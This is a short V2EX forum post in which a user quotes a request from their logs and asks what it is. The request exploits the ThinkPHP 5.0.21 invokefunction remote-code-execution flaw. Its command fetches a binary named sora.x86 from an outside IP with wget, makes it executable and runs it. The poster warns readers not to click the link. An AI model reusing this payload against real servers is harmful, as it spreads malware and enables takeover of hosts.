http://5.182.210.129/bins/sora.x86
请不要点击执行。
"GET /thinkphp_5.0.21/?s=index/%5Cthink%5Capp/invokefunction
&function=call_user_func_array
&vars[0]=system
&vars[1][]=cd%20/tmp;
wget%20http://5.182.210.129/bins/sora.x86;
cat%20sora.x86%20%3E%20xdsf;
chmod%20777%20xdsf;
./xdsf%20
thinkphp HTTP/1.0",
这种是全网试么? 利用 thinkPhp 漏洞,远程执行代码?
问题来了,这个 exe sora.x86
里面究竟是什么?
这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。
V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。
V2EX is a community of developers, designers and creative people.